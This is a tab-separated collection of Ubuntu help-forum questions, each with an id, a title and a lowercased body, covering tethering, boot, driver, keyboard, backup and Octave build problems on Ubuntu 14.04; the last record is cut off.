459722	usb tether keeps repeating 'checking phone status ... '	i am attempting to use the wireless capability of my asus memo pad hd 7 me173x tablet as an access point for my ubuntu pc over usb . i installed usb tether on both my tablet and my computer . i activate the program on the tablet and it seems to work fine . but running the program on my computer , it keeps repeating checking phone status ... , and i ca n't seem to get a connection . i found the site http : //ubuntuforums.org/showthread.php ? t=1941773 and followed the steps . so indeed , i installed libssl-dev and ran ./configure , make and sudo ./run.sh . unfortunately , usb tether still keeps repeating checking phone status ... .
459724	ubuntu 14.04 os keyboard shortcuts caught by programs	i am trying to set alt+a to a keyboard shortcut within system preferences > keyboard shortcuts . i click to the shortcut i want to set so that it says `` new accelerator , '' but hitting alt+a sends me back to the main systems preferences menu . i am seeing this in a number of places , where alt+s will open the history menu of firefox , when instead i want it to run my own keyboard shortcut . i had no problems with setting these things when using 13.10 , it seems 14.04 has broken it . i want to be able to bind whatever key i chose to the shortcut i chose , and override program specific keyboard shortcuts . how can i do this in 14.04 ?
459725	where to get nftables ?	as far as i understand the kernel facility nftables exists in the kernel that comes with ubuntu 14.04 . as is proven by the following two commands : # grep -e ' ( nf_tables|nft_ ) ' /boot/config- $ ( uname -r ) config_nf_tables=m config_nft_exthdr=m config_nft_meta=m config_nft_ct=m config_nft_rbtree=m config_nft_hash=m config_nft_counter=m config_nft_log=m config_nft_limit=m config_nft_nat=m config_nft_compat=m config_nf_tables_ipv4=m config_nft_reject_ipv4=m config_nft_chain_route_ipv4=m config_nft_chain_nat_ipv4=m config_nf_tables_arp=m config_nf_tables_ipv6=m config_nft_chain_route_ipv6=m config_nft_chain_nat_ipv6=m config_nf_tables_bridge=m # lsmod |grep nf nf_conntrack_ipv4 15012 1 nf_defrag_ipv4 12758 1 nf_conntrack_ipv4 nf_nat_ipv4 13263 1 iptable_nat nf_nat 21798 3 ipt_masquerade , nf_nat_ipv4 , iptable_nat nf_conntrack 96976 5 ipt_masquerade , nf_nat , nf_nat_ipv4 , iptable_nat , nf_conntrack_ipv4 however , apt-file search nftables does not yield any results , nor does apt-cache search nftables . so where can i get the new frontend for nftables , i.e . the nftables program matching the kernel modules ?
459726	an `` everything search '' for ubuntu ?	i use this program in windows thats one box and searches all of my drives . by default it lists all files , everywhere , in a single list . is there a linux graphical utility that does this ?
459727	system not coming out of suspend	i have a clean 14.04 ubuntu installation on a dell precision t5400 with a nvidia card . the system is updated and upgraded . when the system goes to into suspend i can see the windows of the apps i had open before the suspend . i can actually move the mouse pointer to the left and see the hide/unhide animation for the tool bar . if a plug a usb stick i can see the nautilus new window . i can restart the desktop by restarting the lightdm process , but i loose all the windows and process i had open of course . does anyone have a solution or a way to debug this problem ? i created this question by accident i meant to say coming out of lock with screen turn off . the reposted question is at : ubuntu 14.04 not comming out of lock , sometimes
459733	ubuntu 14.04 does not run on ibm thinkpad t61 ( ? )	i have a t61 notebook . on this , ubuntu 12.04 lts runs ok. now i would like to upgrade to 14.04 lts . using the same usb stick , i setup the netbook . it runs ! the 'setup ' for 12.04 runs , but 14.04 stalls after : 'battery check ... . [ ok ] ' nothing works . any key or combination-key does nothing . only if i press the power-buttom , then the pc goes down and shuts off . can anybody help me ?
459734	permanent changes to grub2 menu	this is related to this discussion : ubuntu 14.04 not booting after error message . /temp could not be mounted . the answers given in that link allowed me to successfully boot ubuntu 14.04 . however , when i try to edit the grub2 boot entry . it will revert back to the original ( even after saving it ) . i used the command : sudo gedit /etc/grub.d/10_lupin i was able to edit it and save it ( changed ro to rw ) . but after rebooting , it reverts back to the original boot entry . how can i make it permanent ?
459735	having a issue getting files off a old mac hdd	so my mac died on me a while back . i was hoping i could connect it to my ubuntu machine , although when i try to access my music i get a error telling me i do n't have proper permissions . how could i access the music and other files .
459736	why does pinging work when you 've shut down your apache2 webserver ?	i 'm new to apache and linux/ubuntu and generally interested in understanding all the processes going on . i just set up an apache2 webserver on my ubuntu 14.04 partition . i intend to run it as a local host only ( mainly for testing out web design ) . my question is about the operation i guess . i tried pinging my web server ( ping -c ( x ) localhost ) and it obviously came through loud and clear , but when i take it offline ( etc/init.d/apache2 stop ) i can still ping it and get a clear response back . why is this ? does my computer become the default local host when the server is down ? sorry , if this is a really stupid question . i 'm very eager to learn the system !
459737	why does my menu become transparent ?	when i check the `` about this computer '' , the pop up menu becomes transparent . this is the image : also when i right-click the window and choose `` change the desktop background '' , the 'all settings ' comes out ! ! ! ! how can i solve it ? i have tried restarting the computer , but this does n't help .
459739	screen tuns off during skype video conversation	fresh install of ubuntu 14.04 in efi mode . during skype video conversation screen turns off when , it reaches it value set in `` brightness and lock '' - > `` turn off screen when inactive for '' . is there any way to prevent dimming during video , except set `` turn off screen when inactive for '' never ? skype versions 4.2.0.13 , 4.2.0.11 . thank you for any assistance .
459743	ubuntu 14.04 not coming out of lock , sometimes	i have a clean 14.04 ubuntu installation on a dell precision t5400 with a nvidia card . the system is updated and upgraded . when the system locks after 5 minutes , the system does not show the login with password screen . but i can still ses the windows of the apps i had open before the lock . i can actually move the mouse pointer to the left and see the hide/unhide animation for the tool bar . if a plug a usb stick i can see a new nautilus window . i can restart the desktop by restarting the lightdm process , but i loose all the windows and process i had open of course . any ideas how to debug this problem ? somebody has a solution ? best regards , after looking at the `` syslog '' ( after a recommendation from simptnon ) i discovered that the gnome session stops with `` fatal io error 11 '' may 5 11:24:34 slozano-01 kernel : [ 233478.298064 ] usb 1-5.3 : usb disconnect , device number 9 may 5 11:24:34 slozano-01 colord : device removed : sysfs- ( null ) may 5 11:24:34 slozano-01 colord : device removed : sysfs-samsung-galaxy_nexus may 5 11:29:33 slozano-01 kernel : [ 233776.995035 ] nouveau e [ compiz [ 4535 ] ] fail ttm_validate may 5 11:29:33 slozano-01 kernel : [ 233776.995043 ] nouveau e [ compiz [ 4535 ] ] validate vram_list may 5 11:29:33 slozano-01 kernel : [ 233776.995100 ] nouveau e [ compiz [ 4535 ] ] validate : -12 may 5 11:29:33 slozano-01 kernel : [ 233777.254919 ] nouveau e [ compiz [ 4535 ] ] fail ttm_validate may 5 11:29:33 slozano-01 kernel : [ 233777.254927 ] nouveau e [ compiz [ 4535 ] ] validate vram_list may 5 11:29:33 slozano-01 kernel : [ 233777.254982 ] nouveau e [ compiz [ 4535 ] ] validate : -12 may 5 11:43:18 slozano-01 colord : device removed : xrandr-dell inc.-dell 2009w-km50984o435l may 5 11:43:18 slozano-01 colord : device removed : xrandr-dell inc.-dell 2009w-km50984o448l may 5 11:43:18 slozano-01 colord : profile removed : icc-dc7cf53b156187281507a2bdfcabad3c may 5 11:43:18 slozano-01 colord : profile removed : icc-d09afdda29e099d929b13d54c0f5e976 may 5 11:43:18 slozano-01 gnome-session [ 4340 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0. # 012 this maybe is related to bug : `` https : //bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers/+bug/999191 '' . i will remove the nvidia drivers from the system and see if that solves the problem .
459745	ubuntu wo n't boot since upgrading to 14.04	i 'm new to ubuntu so be kind ! i recently installed 13.xx , some months ago . for the most part , there were only a few niggles and i was using ubuntu fine . recently , though , i was asked into an automatic update to 14.04 - since i upgraded , i have developed my problem . i was asked to restart now or later following an update and chose later , only for the screen to go black . when i try to turn the computer back on , i am now faced with the following screen ( apologies for the grandma way of presenting ... i know taking photos of a screen is a cardinal sin ! ) : i read in another thread to press e on this screen , which results in this screen : i also read that i should then change the ro in one of the lines to rw and press f10 . i did this but the screen just goes to purple and does not change . am i doing everything wrong ? thanks for reading and helping out an oldie ( but a linux newbie ! ) : - )
459753	open bash shell script files without terminal	how do you run shell script files without using the terminal in ubuntu ? like just double clicking it . i know in xubuntu it does it like that but not regular ubuntu .
459757	: set title in vim does n't work in gnome terminal	i need to be able to see what i 'm working on . on my sisters laptop using unity , : set title sets the title , but on my gnome desktop with gnome terminal 3.10.2 it does n't do anything . i can set the title with the command gnome-terminal -- title= '' some title '' i can set the title in the gnome terminal preferences menu , and i do know that i have set the option to replace the initial title .
459760	enable special keys in lubuntu 14.04	i 've done a lot of reading and can not find a simple answer to what seems like it should be a simple question . how do i define the functions of the extra keys such as the `` my computer '' and `` web browser '' keys ? here 's what i 've done so far . install lubuntu 14.04 run xev to cap keycode for `` web/home '' button ( 180 ) run xmodmap -jke to get keysym ( xf86homepage ) edited .config/openbox/lubuntu-rc.xml to include : < ! -- keybinding for webhome button -- > < keybind key= '' xf86homepage '' > < action name= '' execute '' > < command > lxsession-default webbrowser < /command > < /action > < /keybind > relog press `` web/home '' button lxsession exits to login screen the default web browser in lxsession configuration - > launching applications is set to x-www-browser and the `` web browser '' button on the application launch bar works perfectly . pressing the `` web/home '' button prior to making any changes does absolutely nothing . it does not exit to the login screen . the volume buttons work fine `` out of the box '' but the calculator button is keycode 140 and mapped to keysym sunfront . pressing it exits to the login screen as well and attempting to reprogram it following the steps above also results in exiting to the login screen . this process is extremely opaque with very few references/howtos on how to get this working `` out of the box '' on a fresh ubuntu install . any help would be greatly appreciated .
459761	unity 14.04 problem : fine from live usb , no dash and no launcher after installed	last night installed 14.04 : i386 on my netbook , from a live usb . using the live usb , unity works fine . after installed the system , there was no launcher and no dash . after spending hours of trying lots of things and reading a lot of pages , i 've found this difference between the usb system and the installation on the netbook : opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) opengl version string : 2.1 mesa 10.1.0 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no that 's from the one installed . the usb 's says this : opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) 945gme x86/mmx/sse2 opengl version string : 1.4 mesa 10.1.0 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes that 's the output of `` /usr/lib/nux/unity_support_test -p '' . so , i got gallium after 14.04 installed , and it does n't seems to work ok with my hardware . how can i get the same driver i got on the live usb ? update : i 've installed the default intel drivers , and the unity_support_test output is the same in both the usb live system , and the one installed . however , i still have no launcher and no dash . here 's a screenshot .
459764	no secure boot option	i have an asus a55a series laptop , intel 3 core , 4gb memory , replaced motherboard , and upgraded from pre-installed windows 8.1 to 8.2 , and now i can not find any secure boot option . when i go to the bios and look for the secure boot option for me to disable in order to run ubuntu . so if anyone can tell me how to make secure boot appear or fix it that 'd be great . it does n't boot ubuntu on start up , which is why i 'm thinking it has to do with the secure boot option .
459766	ubuntu 14.04 gui will not boot after sudo apt-get install mpich2	after install gui destop version of ubunti14.04 on my dell c1100 poweredge server . sudo apt-get install build-essential sudo apt-get install gfortran sudo apt-get install mpich2 on restart the ubuntu gui hangs up just before the log-in page should appear . any idea how to fix it ?
459767	running linux downloads - total noob	i am a completely new user to linux and have been using most of my programs through wine . take for example this program : http : //www.atlauncher.com/download/jar/ which , when unpacked has no executable files . i 'm not sure if i am looking for the wrong type of file but i would really appreciate some help on how to get downloads like this with no obvious runnable files up and running . thanks in advance
459770	ubuntu 12.04 qualcomm atheros qca8171 gigabit ethernet driver install	there are quite a few of these threads which i have looked through the past few hours , however , not one have i been able to adapt to work for my particular card . my motherboard blew so this is a new board new processor and ram but with the original hdd install intact . my initial thought was that the os is looking/using a driver for my original board however i have no idea where to begin to look/alter this . secondly , after reading i fear it could be that the card dos not yet have a driver in ubuntu . my issue here is that my ethernet card shows up in ls pci but not in ifconfig . i have no internet access so i can not run apt-get update or connect to my local network . either way i was wondering if it would be possible for any of you guys could help me out getting my ethernet up and running ! your help has always been top of the bar ! all the best
459771	co-using folder with root	i 'm searching for a workaround for creating a folder which will be fully co-used with root and user including new subdirectories . example of usage : i have an application which sometimes needs to run under root . the application has some global configuration files and project configuration files and some project files . while it is working the application can create , edit , delete files and create , edit , delete folders . i want to run the application after under user and not have any issues with permissions . are there any workarounds for a scenario like this ? update : all `` duplicate answers '' were not able to resolve my issue . you still ca n't create subdirectories which will inherit permission rules . i need to allow this scenario : we have a shared folder called `` test '' . root : mkdir dir1 // under test folder cd dir1 touch file1 user : cd test/dir1 rm file1
459773	ca n't play quicktime rle in ubuntu 14.04	i frequently create videos from png sequences using avconv by running : avconv -r 24 -i images % 6d.png -vcodec qtrle video.mov since i 've upgraded to 14.04 i can not play back them any more . not with totem , not with mplayer . totem show only the first frame , and nothing happens when i press play . mplayer reports : dropping frame with size not matching configured size too many buffered pts same videos play fine with totem on 13.10 .
459774	starting a process ( sudo start ) on boot up	so once i log into my ubuntu vm i launch my application by doing a sudo app now i want my application to get started while booting . i tried it by creating an rc . script but nothing seems to work . can someone point me to the correct way of getting it done ? also my application has to run sudo . hoping auto start will have the runlevel as root
459777	black screen after enabling root user	i 'm new at ubuntu . i had to enable the root user . once i did by running sudo passwd root i restarted the computer and i get a blank screen and i ca n't login . what should i do ? is there a way to fix this without reinstalling ?
459779	ubuntu 14.04 kvm instance has low resolution	i have a kvm guest instance of ubuntu 14.04 running with a vga type video device . i do not have a /etc/x11/xorg.conf file , i am letting x autoconfigure the video and all devices . when x comes up , the screen resolution is only 800x600 . the expected resolution is 1280x768 . i used to get the correct resolution before upgrading to 14.04 . the 14.04 guest image was originally cloned from a 13.10 kvm guest instance . when i boot the 13.10 guest now , i still get the correct 1280x768 resolution . it seems like something has changed for the worse between 13.10 and 14.04 , any ideas if this is expected ( do i now need xorg.conf ? ) or should be reported as a bug ?
459783	weird symbol has replaced the letter `` h ''	i just recently installed pipelight and netflix desktop and now it looks like a weird symbol has replaced the letter `` h '' . screenshoot : i 'm using ubuntu 14.04
459787	ubuntu 14.04 - dual monitor issue ( aspect ratio )	so i recently installed ubuntu 14.04 and i 've been able to google every problem i had and find an answer except this one . in screen display i can run my built-in display at 1366x768 ( 16:9 ) and my tv up to 1920 x 1080 ( 16:9 ) if they are extended . if i try to mirror the displays at 1366x768 ( 16:9 ) it limits the options to 4:3 and stretches the display . anyone have this issue before and/or find a situation ? here 's the display information i get from : sudo lshw -c video *-display description : vga compatible controller product : sumo [ radeon hd 6480g ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:44 memory : e0000000-efffffff ioport:4000 ( size=256 ) memory : f0500000-f053ffff lastly i should mention i 'm able to mirror the displays in windows 7 so i doubt it is a hardware issue . thanks in advance !
459788	how to enable amd turbo core on ubuntu 14.04 ?	i 'm using ubuntu 14.04 ( 3.13.0-24-generic kernel ) on amd a8-4500m based laptop , and i 've recently noticed , that amd turbo core is not working at all . everything works on windows , however , on linux cpu frequency ca n't get past 1.9 ghz ( checked with cpufreq-aperf ) . here is output of cpupower frequency-info , notice active : no under boost state support : analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 4.0 us . hardware limits : 1.40 ghz - 1.90 ghz available frequency steps : 1.90 ghz , 1.80 ghz , 1.70 ghz , 1.60 ghz , 1.40 ghz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 1.90 ghz and 1.90 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 1.90 ghz ( asserted by call to hardware ) . cpufreq stats : 1.90 ghz:32,63 % , 1.80 ghz:0,74 % , 1.70 ghz:0,50 % , 1.60 ghz:1,20 % , 1.40 ghz:64,93 % ( 9287 ) boost state support : supported : yes active : no boost states : 2 total states : 8 pstate-pb0 : 2800mhz ( boost state ) pstate-pb1 : 2300mhz ( boost state ) pstate-p0 : 1900mhz pstate-p1 : 1800mhz pstate-p2 : 1700mhz pstate-p3 : 1600mhz pstate-p4 : 1400mhz pstate-p5 : 900mhz more tests ( ran with ondemand scheduler and 3 instances of ffmpeg decoding 1920x1080 h.264 video in background ) : [ m132 @ m132 turbostat ] $ sudo cpupower monitor [ sudo ] password for m132 : |mperf || idle_stats cpu | c0 | cx | freq || poll | c1 | c2 0| 97,78| 2,22| 1821|| 0,00| 0,00| 0,00 1| 97,84| 2,16| 1821|| 0,00| 0,00| 0,00 2| 99,22| 0,78| 1807|| 0,00| 0,00| 0,00 3| 99,18| 0,82| 1808|| 0,00| 0,00| 0,00 [ m132 @ m132 turbostat ] $ sudo ./turbostat cor cpu ghz tsc time 1.81 1.90 5** 0 0 1.81 1.90 5** 1 1 1.81 1.90 2 2 1.80 1.90 3 3 1.81 1.90 edit : it seems like trinity series processors have it 's own bapm switch in source . it 's located in drivers/gpu/drm/radeon/trinity_dpm.c and it 's ( at the time of writing ) enabled only for msi boards , because of stability issues . to enable it , open this file , find this line : pi- > enable_bapm = false ; change false to true , then compile and install new kernel . you should get a kernel panic boost working now . keep in mind that cpu power is also shared with gpu , so you 'll almost never get the highest frequency available if gpu is also in use .
459791	ubuntu password reset question unable to shutdown 12.04	so basically my father passed away has unbuntu on a lenovo t61 . i have no idea what his password was and i really want to be able to access all the stuff on his computer . i have done the following with no success . 1.i changed the password by editing 'ro quiet splash $ vt handoff ' to 'rw init=/bin/bash' 2.i typed in root @ ( none ) passwd root 3. changed the password successfully but when i try to reboot i get a message that says 'unable to shutdown' i just need to get the files and whatnot off of this computer . please help ! thank you scott
459792	`` 'mega ' object has no attribute 'get_name_from_file ' '' when writing files to mega	i am trying to have deja-dup backup my system to my https : //mega.co.nz account 1- déjà dup = ubuntu easy front end to the powerful duplicity 2- duplicity states it supports mega as from version v0.6.23 ( through a mega : // uri ) -- -using duplicity v0.6.23 -- -- the command duplicity /test mega : //myemail % 40yahoo.com : mypassword @ mega.co.nz/test successfully writes files in my mega directory but it displays the following errors : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1489 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1483 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1332 , in main do_backup ( action ) file `` /usr/bin/duplicity '' , line 1361 , in do_backup sync_archive ( decrypt ) file `` /usr/bin/duplicity '' , line 1094 , in sync_archive remlist = globals.backend.list ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 429 , in list return map ( tobytes , self._list ( ) ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 330 , in iterate return fn ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/megabackend.py '' , line 115 , in _list % ( self.__get_node_name ( self.folder ) , str ( e ) ) , raise_errors ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/megabackend.py '' , line 139 , in __get_node_name return self.client.get_name_from_file ( { handle : files [ handle ] } ) attributeerror : 'mega ' object has no attribute 'get_name_from_file' -- -using déjà dup 30.0 -- -- in the `` storage '' tab , i select backup location : custom location uri : mega : //myemail % 40yahoo.com : mypassword @ mega.co.nz/test but it produces the error `` backup failed : location is not mountable '' do you know any solution to use déjà dup ( or duplicity without errors ) to create an easy backup solution to mega.co.nz ? thanks for any help !
459795	installing amd drivers help	just recently installed ubuntu ( my first time using it ) and i was wondering if i could install amd drivers through the option in steam that allows you to check for drivers/updates for your amd graphics card . could you successfully install drivers for your amd graphics card through steam instead of doing it the usual way you would on ubuntu 14.04 ( idk what that way is if i ca n't do it through steam , i 'll just look through here on how to install them ) ?
459796	drag and drop application launcher problem in ubuntu 14.04	in ubuntu 13.10 i was able to drag most application launchers that show in `` search your computer and online sources '' - > `` applications '' to my desktop or a folder on my desktop . i can not manage this in ubuntu 14.04 , perhaps because i am not using the right key combination or this needs to be set up in some way . can anyone help me to access this function ? thanks , paul .
459797	unable to boot ubuntu from hard drive after installation of 14.04	i just installed ubuntu 14.04 on my computer , but for some reason i can not boot the hard drive . when i select the hard drive , it says something about it not existing , or it was waiting too long for it . i do n't know what to do , but right now i am booted from my usb . is there a way to install ubuntu on to the hard disk from usb without using what was installed on the usb , like download it again , and install from usb ? ( not the same as installing what i downloaded on to my usb . ) i am not dual booting , i have a normal pc toshiba and i do get a grub menu when i select ubuntu , it says `` gave up waiting for root device '' and then it says `` /dev/disk/by-uuid/ '' bunch of letters and numbers and hyphens '' does not exist ''
459798	how can i go back to command line ?	when i run ipython notebook or gedit in terminal , the command line does not appear and it stops somewhere . how can i go back to command line mode ?
459800	bose companion not working ubuntu 14.04	i have installed ubuntu 14.04 64 bit lts on my old pc , it was dimension 5100 . 4gb ram . i have bose companion speakers , which are recognised but there is no sound output . initially there was sound output for few seconds , not its not working . i tried few things that were mentioned on this forum earlier , but did not work for me . what can be a problem and whats the solution ? thanks .
459801	bind9 as authoritative server , but caching/forwarding -- without axfr	i 'd like to setup a dns server that acts a secondary authoritative server in case the primary goes down . normally , that 'd be easy to accomplish with axfr , but i want it to be secondary to cloudflare , which does n't offer zone transfers . is this possible using existing software ? i 'm planning on attempting it with bind9 , but anything reliable will do . in theory , the server would just need to act as a combination of caching , forwarding , and authoritative servers , all for the same zone .
459802	why would alt-doubleclick minimize a window , and how can that be stopped ?	i installed ubuntu 1404 , and fvwm . for some reason now , alt-click in a window is not detected . alt-doubleclick minimizes a window . i assume that alt-click is n't detected because the window minimizer is waiting to see if there is an alt-doubleclick coming . where could `` alt-doubleclick minimizes a window '' behavior come from ? i have n't seen it before and did n't change fvwm config files . why does n't alt-click work any more ? when using xev , clicks make normal buttonpress events show up . alt-click makes no buttonpress events . how can i find out who is trapping the alt-clicks please ?
459803	problem installing ubuntu from livedvd : `` could not find a medium with live file system ''	i 've been trying for the past 3 days and am infuriated at all those failures . this makes 8 dvds i 've burned using a variety of methods , including those from the official ubuntu page and nothing works . when i follow these instructions i get the error : could not find a medium with live file system i am burning this on a windows 7 to install over a windows xp computer . the xp computer can not boot via usb thumbdrive , so i must do it via a dvd . can someone tell me what i 'm doing wrong ? i pop in the dvd , right click the iso then click `` burn image disc '' as per the prior link 's instructions . it burns correctly . i put it in the xp computer the `` demo & installation '' window opens , i select `` restart now '' it restarts , opens the 'loading ' ubuntu page . then goes to a black error screen saying it can not find a medium with live file system . what am i doing wrong here ? i 've also tried : burning the iso pure ; burning the iso extracted manually ; burning the iso pure via software ; extracting the iso files and burning via software . i 've also burned the dvd manually with the live file system where i get an error saying it 's missing the `` /ubuntu/install/custom-installation '' file . i desperately need to install a new os on that pc as i do not have the original windows installation discs ( salvaging the pc from a family member who threw them out ) . i do not even get to start the installation , by the way . i get no control before it shows either of these errors and then i must force reboot with the power button as princess leia once said : `` help me ubuntu community , you 're our only hope ! ''
459804	run a custom init script always before lightdm.conf	i have a firstboot script /etc/init/firstboot.conf which starts on `` filesystem '' . this file creates some symlinks to some libs in /usr/lib issue is , /etc/init/lightdm.conf also starts on `` filesystem '' . if i traverse backwards , mountall.conf is the file which emits `` filesystem '' event and when this event is generated , lightdm.conf as well as my custom firstboot.conf both try to execute their scripts but the ordering is not guarenteed and you can never tell which one runs first . now i want to always ensure that firstboot.conf runs before lightdm.conf . how can i ensure this without editing lightdm.conf ( i know i can create a dependency by emitting an event in my firstboot.conf and modify the lightdm.conf to start on that emitted event , but i dont wan na do this . need a better approach which deals only with my custom firstboot.conf ! ! )
459807	remote desktop from windows mobile to ubuntu	i 'm using ubuntu 14.04 , i 'm wondering is there a any possibility , to share remote desktop from windows mobile pocket pc device . like activesync remote display , from ms windows mobile developer power toys . first i would like to try establish connection using activesync , to check if this working with wine . i think it 's a first thing worth to try , but maybe some known alternatives ? i was looking for synce , but it 's damnably hard to find those packets good to my system , maybe some of you have a clear directions what to do , to bring synce to my system . but like i 've said , i 'm also open on alternatives : ) any tips what should i try , any ideas or alternative routes , to solve this ?
459808	restore typeahead in nautilus ( ubuntugnome )	in the default version of nautilus that ubuntugnome comes with , when you begin typing in a folder , instead of selecting the first matching file , nautilus executes a full search of all subdirectories . the search is laggy , and moreover is not what most users are accustomed to happening . in the default unity-based ubuntu 14.04 , the old behavior ( `` typeahead '' ) has been restored through a patch to nautilus . is there a way to patch nautilus in ubuntugnome to restore `` typeahead '' functionality ?
459809	octave install error when libreadline was installed to /usr/local/	i installed octave 3.8.1 a few months ago and discovered that the gnu readline was not working properly . i tried reinstalling octave 3.8.0 , but the gnu readline does not work for the previous version now . gnu readline was working properly for octave 3.8.0 before i installed 3.8.1 . i tried installing gnu readline and ncursers , but sudo make does not recognize readline and ncursers exists . /usr/local/lib/libreadline.so.6 : undefined reference to `tgetstr' /usr/local/lib/libreadline.so.6 : undefined reference to `tputs' /usr/local/lib/libreadline.so.6 : undefined reference to `bc' /usr/local/lib/libreadline.so.6 : undefined reference to `tgetent' /usr/local/lib/libreadline.so.6 : undefined reference to `tgetflag' /usr/local/lib/libreadline.so.6 : undefined reference to `tgoto' /usr/local/lib/libreadline.so.6 : undefined reference to `up' /usr/local/lib/libreadline.so.6 : undefined reference to `tgetnum' /usr/local/lib/libreadline.so.6 : undefined reference to `pc' collect2 : ld returned 1 exit status make [ 2 ] : *** [ octave-cli ] error 1 make [ 2 ] : leaving directory `/home/gin/downloads/octave-3.8.0/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/gin/downloads/octave-3.8.0' make : *** [ all ] error 2 below are my synaptic packages of readline installed on my computer . below are my synaptic packages of ncursers installed on my computer . has anyone been able to resolve this problem ? thanks . below is the directory for where my readline files are located . @ : /usr/local/lib $ ls libhistory.a libpcreposix.a libreadline.so.6.3.old libhistory.old libpcreposix.la libsdl2-2.0.so.0 libhistory.so libpcreposix.so libsdl2-2.0.so.0.1.0 libhistory.so.6 libpcreposix.so.0 libsdl2.a libhistory.so.6.3 libpcreposix.so.0.0.2 libsdl2.la libhistory.so.6.3.old libpcre.so libsdl2main.a liblua.a libpcre.so.1 libsdl2.so libpcre.a libpcre.so.1.2.2 libsdl2_test.a libpcrecpp.a libreadline.a lua libpcrecpp.la libreadline.old octave libpcrecpp.so libreadline_problem.so.6 pkgconfig libpcrecpp.so.0 libreadline.so python2.7 libpcrecpp.so.0.0.0 libreadline.so.6 vmd libpcre.la libreadline.so.6.3 i tried bain 's solution . i received the following installation errors . $ sudo find /usr/local -name '*octave* ' -exec rm -f { } \ ; rm : can not remove `/usr/local/include/octave-3.8.0 ' : is a directory rm : can not remove `/usr/local/include/octave-3.8.0/octave ' : is a directory rm : can not remove `/usr/local/include/octave-3.8.1 ' : is a directory rm : can not remove `/usr/local/include/octave-3.8.1/octave ' : is a directory rm : can not remove `/usr/local/libexec/octave ' : is a directory rm : can not remove `/usr/local/lib/octave ' : is a directory rm : can not remove `/usr/local/share/octave ' : is a directory rm : can not remove `/usr/local/share/octave/3.8.1/etc/tests/liboctave ' : is a directory rm : can not remove `/usr/local/share/octave/3.8.1/etc/tests/libinterp/octave-value ' : is a directory rm : can not remove `/usr/local/share/octave/3.8.0/etc/tests/liboctave ' : is a directory rm : can not remove `/usr/local/share/octave/3.8.0/etc/tests/libinterp/octave-value ' : is a directory $ sudo apt-get install octave ... errors were encountered while processing : octave e : sub-process /usr/bin/dpkg returned an error code ( 1 ) third image fourth image below is the readline.so.6 being recreated during the purge-install process for octave $ : /usr/local/lib $ ls libhistory.a libpcrecpp.a libpcreposix.so libreadline.so libsdl2main.a libhistory.old libpcrecpp.la libpcreposix.so.0 libreadline.so.6 libsdl2.so libhistory.so libpcrecpp.so libpcreposix.so.0.0.2 libreadline.so.6.3 libsdl2_test.a libhistory.so.6 libpcrecpp.so.0 libpcre.so libreadline.so.6.3.old lua libhistory.so.6.3 libpcrecpp.so.0.0.0 libpcre.so.1 libsdl2-2.0.so.0 pkgconfig libhistory.so.6.3.old libpcre.la libpcre.so.1.2.2 libsdl2-2.0.so.0.1.0 python2.7 liblua.a libpcreposix.a libreadline.a libsdl2.a vmd libpcre.a libpcreposix.la libreadline.old libsdl2.la $ : /usr/local/lib $ sudo rm /usr/local/lib/libreadline.so.6 $ : /usr/local/lib $ ls libhistory.a libpcrecpp.a libpcreposix.so libreadline.so libsdl2.so libhistory.old libpcrecpp.la libpcreposix.so.0 libreadline.so.6.3 libsdl2_test.a libhistory.so libpcrecpp.so libpcreposix.so.0.0.2 libreadline.so.6.3.old lua libhistory.so.6 libpcrecpp.so.0 libpcre.so libsdl2-2.0.so.0 pkgconfig libhistory.so.6.3 libpcrecpp.so.0.0.0 libpcre.so.1 libsdl2-2.0.so.0.1.0 python2.7 libhistory.so.6.3.old libpcre.la libpcre.so.1.2.2 libsdl2.a vmd liblua.a libpcreposix.a libreadline.a libsdl2.la libpcre.a libpcreposix.la libreadline.old libsdl2main.a $ : /usr/local/lib $ sudo apt-get purge '.*octave . *' $ : /usr/local/lib $ ls libhistory.a libpcrecpp.a libpcreposix.so libreadline.so libsdl2main.a libhistory.old libpcrecpp.la libpcreposix.so.0 libreadline.so.6 libsdl2.so libhistory.so libpcrecpp.so libpcreposix.so.0.0.2 libreadline.so.6.3 libsdl2_test.a libhistory.so.6 libpcrecpp.so.0 libpcre.so libreadline.so.6.3.old lua libhistory.so.6.3 libpcrecpp.so.0.0.0 libpcre.so.1 libsdl2-2.0.so.0 pkgconfig libhistory.so.6.3.old libpcre.la libpcre.so.1.2.2 libsdl2-2.0.so.0.1.0 python2.7 liblua.a libpcreposix.a libreadline.a libsdl2.a vmd libpcre.a libpcreposix.la libreadline.old libsdl2.la $ : /usr/local/lib $ sudo rm /usr/local/lib/libreadline.so.6 $ : /usr/local/lib $ ls libhistory.a libpcrecpp.a libpcreposix.so libreadline.so libsdl2.so libhistory.old libpcrecpp.la libpcreposix.so.0 libreadline.so.6.3 libsdl2_test.a libhistory.so libpcrecpp.so libpcreposix.so.0.0.2 